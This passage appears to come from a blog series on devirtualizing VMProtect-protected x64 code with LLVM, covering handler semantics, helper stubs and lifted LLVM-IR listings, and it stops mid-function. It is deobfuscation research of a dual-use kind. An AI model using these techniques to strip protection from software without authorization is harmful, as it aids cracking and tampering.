The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and (ex|im)plicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.

This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and a better registers allocation during the recompilation phase.

An example of the lifted unsupported instruction rdtsc follows:

define void @Unsupported_rdtsc(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = tail call %IAOutTy.0 asm sideeffect inteldialect "rdtsc", "={eax},={edx}"() #1
  %3 = bitcast %ContextTy* %0 to i32*
  %4 = extractvalue %IAOutTy.0 %2, 0
  store i32 %4, i32* %3, align 4
  %5 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %6 = bitcast %RegisterW* %5 to i32*
  %7 = extractvalue %IAOutTy.0 %2, 1
  store i32 %7, i32* %6, align 4
  ret void

An example of the lifted unsupported instruction cpuid follows:

define void @Unsupported_cpuid(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = bitcast %ContextTy* %0 to i32*
  %3 = load i32, i32* %2, align 4
  %4 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 2, i32 0
  %5 = bitcast %RegisterW* %4 to i32*
  %6 = load i32, i32* %5, align 4
  %7 = tail call %IAOutTy asm sideeffect inteldialect "cpuid", "={eax},={ecx},={edx},={ebx},{eax},{ecx}"(i32 %3, i32 %6) #1
  %8 = extractvalue %IAOutTy %7, 0
  store i32 %8, i32* %2, align 4
  %9 = extractvalue %IAOutTy %7, 1
  store i32 %9, i32* %5, align 4
  %10 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %11 = bitcast %RegisterW* %10 to i32*
  %12 = extractvalue %IAOutTy %7, 2
  store i32 %12, i32* %11, align 4
  %13 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 1, i32 0
  %14 = bitcast %RegisterW* %13 to i32*
  %15 = extractvalue %IAOutTy %7, 3
  store i32 %15, i32* %14, align 4
  ret void


I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:

  • If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
  • If the goal is to achieve a 1:1 register allocation, then things get more complicated because one can’t simply map all the general purpose register pointers to the hardware registers hoping for no side-effect to manifest.

The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.

Results showcase

The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):

  • 0x140001d10@DevirtualizeMe1: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
  • 0x140001e60@DevirtualizeMe2: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
  • 0x140001d20@DevirtualizeMe2: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
  • 0x13001334@EMP: DllEntryPoint, calling another internal function (intra-call);
  • 0x1301d000@EMP: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
  • 0x130209c0@EMP: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
  • 0x1400044c0@Switches64: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.

Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.


I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.

The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.

Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.

I’d like to thank:

  • Peter, for introducing me to LLVM and working on SATURN together.
  • mrexodia and mrphrazer, for the in-depth review of the posts.
  • justmusjle, for enhancing the colors used by the diagrams.
  • Secret Club, for their suggestions and series hosting.

See you at the next LLVM adventure!

Tickling VMProtect with LLVM: Part 1

By: fvrmatteo
8 September 2021 at 23:00

This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:


First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.

  • In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I, hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
  • In 2018, a person nicknamed RYDB3RG, posted on Tuts4You a first insight on how LLVM optimizations could be beneficial when optimising VMProtected code. Although the easy example that was provided left me with a lot of questions on whether that approach would have been hassle-free or not.
  • In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.

The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.

Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.

With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.

I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.


The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.

Lifting pipeline

Enough words or code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to make LLVM’s job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.

Liveness and aliasing information

Let’s start by saying that many deobfuscation tools are completely disregarding, or at best unsoundly handling, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM on the contrary is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally LLVM also has strong optimization passes benefiting from precise liveness information, that we absolutely want to take advantage of to clean any unnecessary stores to memory that are irrelevant after the execution of the virtualized code.

This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.

A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.

At a high level we can summarize the data-related virtual machine components as follows:

  • 30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.

  • 19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.

  • 16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won’t affect the others. Contrarily to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is also treated as the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.

  • 4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct with each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.

Helper functions

With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.

When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.

Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):

struct VirtualRegister final {
  union {
    alignas(1) struct {
      uint8_t b0;
      uint8_t b1;
      uint8_t b2;
      uint8_t b3;
      uint8_t b4;
      uint8_t b5;
      uint8_t b6;
      uint8_t b7;
    } byte;
    alignas(2) struct {
      uint16_t w0;
      uint16_t w1;
      uint16_t w2;
      uint16_t w3;
    } word;
    alignas(4) struct {
      uint32_t d0;
      uint32_t d1;
    } dword;
    alignas(8) uint64_t qword;
  } __attribute__((packed));
} __attribute__((packed));

using rref = size_t &__restrict__;

extern "C" uint8_t RAM[0];
extern "C" uint8_t GS[0];
extern "C" uint8_t FS[0];

extern "C"
size_t HelperStub(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR,
  rref vsp, rref vip,
  VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots);

extern "C"
size_t HelperFunction(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[19] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;

The VirtualRegister structure is meant to represent a VmRegister, divided in smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don’t necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64 bits bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.

The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions, that, once compiled to LLVM-IR, will generate a pointer parameter with a noalias attribute. The noalias attribute is hinting to the compiler that any memory access happening inside the function that is not dereferencing a pointer derived from the pointer parameter, is guaranteed not to alias with a memory access dereferencing a pointer derived from the pointer parameter.

The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.

The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.

The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.

The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.

The compiled and optimized LLVM-IR code for the described C++ definitions follows:

%struct.VirtualRegister = type { %union.anon }
%union.anon = type { i64 }
%struct.anon = type { i8, i8, i8, i8, i8, i8, i8, i8 }

@RAM = external local_unnamed_addr global [0 x i8], align 1
@GS = external local_unnamed_addr global [0 x i8], align 1
@FS = external local_unnamed_addr global [0 x i8], align 1

declare i64 @HelperStub(i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64, i64, i64, i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), %struct.VirtualRegister*, i64*) local_unnamed_addr

define i64 @HelperFunction(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
  %vmregs = alloca [30 x %struct.VirtualRegister], align 16
  %slots = alloca [30 x i64], align 16
  %vip = alloca i64, align 8
  %0 = bitcast [30 x %struct.VirtualRegister]* %vmregs to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %0, i8 0, i64 240, i1 false)
  %1 = bitcast [30 x i64]* %slots to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %1, i8 0, i64 240, i1 false)
  %2 = bitcast i64* %vip to i8*
  store i64 0, i64* %vip, align 8
  %arraydecay = getelementptr inbounds [30 x %struct.VirtualRegister], [30 x %struct.VirtualRegister]* %vmregs, i64 0, i64 0
  %arraydecay1 = getelementptr inbounds [30 x i64], [30 x i64]* %slots, i64 0, i64 0
  %call = call i64 @HelperStub(i64* nonnull align 8 dereferenceable(8) %rax, i64* nonnull align 8 dereferenceable(8) %rbx, i64* nonnull align 8 dereferenceable(8) %rcx, i64* nonnull align 8 dereferenceable(8) %rdx, i64* nonnull align 8 dereferenceable(8) %rsi, i64* nonnull align 8 dereferenceable(8) %rdi, i64* nonnull align 8 dereferenceable(8) %rbp, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %r8, i64* nonnull align 8 dereferenceable(8) %r9, i64* nonnull align 8 dereferenceable(8) %r10, i64* nonnull align 8 dereferenceable(8) %r11, i64* nonnull align 8 dereferenceable(8) %r12, i64* nonnull align 8 dereferenceable(8) %r13, i64* nonnull align 8 dereferenceable(8) %r14, i64* nonnull align 8 dereferenceable(8) %r15, i64* nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 0, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* nonnull %arraydecay, i64* nonnull %arraydecay1)
  ret i64 %call

Semantics of the handlers

We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.

The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.


To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.

template <typename T> __attribute__((always_inline)) void STACK_PUSH(size_t &vsp, T value) {
  // Update the stack pointer
  vsp -= sizeof(T);
  // Store the value
  std::memcpy(&RAM[vsp], &value, sizeof(T));

We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.


As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.

template <typename T> __attribute__((always_inline)) T STACK_POP(size_t &vsp) {
  // Fetch the value
  T value = 0;
  std::memcpy(&value, &RAM[vsp], sizeof(T));
  // Undefine the stack slot
  T undef = UNDEF<T>();
  std::memcpy(&RAM[vsp], &undef, sizeof(T));
  // Update the stack pointer
  vsp += sizeof(T);
  // Return the value
  return value;

We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.


Being a stack machine, we know that it is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back to the stack. There are four variations of the addition handler, meant to handle 8/16/32/64 bits operands, with the peculiarity that the 8 bits case is really popping 16 bits per operand off the stack and pushing a 16 bits result back to the stack to be consistent with the x64 push/pop alignment rules.

From what we just described the only thing we need is the virtual stack pointer, to be able to access the stack.

// ADD semantic

template <typename T>
bool AF(T lhs, T rhs, T res) {
  return AuxCarryFlag(lhs, rhs, res);

template <typename T>
bool PF(T res) {
  return ParityFlag(res);

template <typename T>
bool ZF(T res) {
  return ZeroFlag(res);

template <typename T>
bool SF(T res) {
  return SignFlag(res);

template <typename T>
bool CF_ADD(T lhs, T rhs, T res) {
  return Carry<tag_add>::Flag(lhs, rhs, res);

template <typename T>
bool OF_ADD(T lhs, T rhs, T res) {
  return Overflow<tag_add>::Flag(lhs, rhs, res);

template <typename T>
void ADD_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags
  bool cf = CF_ADD(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = OF_ADD(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);

template <typename T>
void ADD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Initialize the operands
  T op1 = 0;
  T op2 = 0;
  // Fetch the operands
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  // Calculate the add
  T res = UAdd(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  ADD_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  // 7. Save the flags
  STACK_PUSH<size_t>(vsp, flags);

DEFINE_SEMANTIC_64(ADD_64) = ADD<uint64_t>;
DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
DEFINE_SEMANTIC(ADD_16) = ADD<uint16_t>;

We can see that the function definition is templated with a T parameter that is internally used to generate the properly-sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally we are taking care of truncating and zero extending the special 8 bits case. Finally, after the unsigned addition took place, we rely on Remill’s semantically proven flag computations to calculate the fresh flags before pushing them to the stack.

The other binary and arithmetic operations are implemented following the same structure, with the correct operands access and flag computations.


This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and the value of the VmRegister. The template is additionally defining the size of the pushed value and the offset from the VmRegister slot base.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void PUSH_VMREG(size_t &vsp, VirtualRegister vmreg) {
  // Update the stack pointer
  vsp -= ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
  // Select the proper element of the virtual register
  if constexpr (Size == 64) {
    std::memcpy(&RAM[vsp], &vmreg.qword, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d0, sizeof(uint32_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d1, sizeof(uint32_t));
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.word.w0, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.word.w1, sizeof(uint16_t));
    } else if constexpr (Offset == 2) {
      std::memcpy(&RAM[vsp], &vmreg.word.w2, sizeof(uint16_t));
    } else if constexpr (Offset == 3) {
      std::memcpy(&RAM[vsp], &vmreg.word.w3, sizeof(uint16_t));
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = ZExt(vmreg.byte.b0);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      uint16_t byte = ZExt(vmreg.byte.b1);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    // NOTE: there might be other offsets here, but they were not observed


We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.


This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and a reference to the VmRegister to be updated. As before the template is defining the size of the popped value and the offset into the VmRegister slot.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void POP_VMREG(size_t &vsp, VirtualRegister &vmreg) {
  // Fetch and store the value on the virtual register
  if constexpr (Size == 64) {
    uint64_t value = 0;
    std::memcpy(&value, &RAM[vsp], sizeof(uint64_t));
    vmreg.qword = value;
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF00000000) | value);
    } else if constexpr (Offset == 1) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0x00000000FFFFFFFF) | UShl(ZExt(value), 32));
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFFFFFF0000) | value);
    } else if constexpr (Offset == 1) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF0000FFFF) | UShl(ZExtTo<uint64_t>(value), 16));
    } else if constexpr (Offset == 2) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFF0000FFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 32));
    } else if constexpr (Offset == 3) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0x0000FFFFFFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 48));
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b0 = Trunc(byte);
    } else if constexpr (Offset == 1) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b1 = Trunc(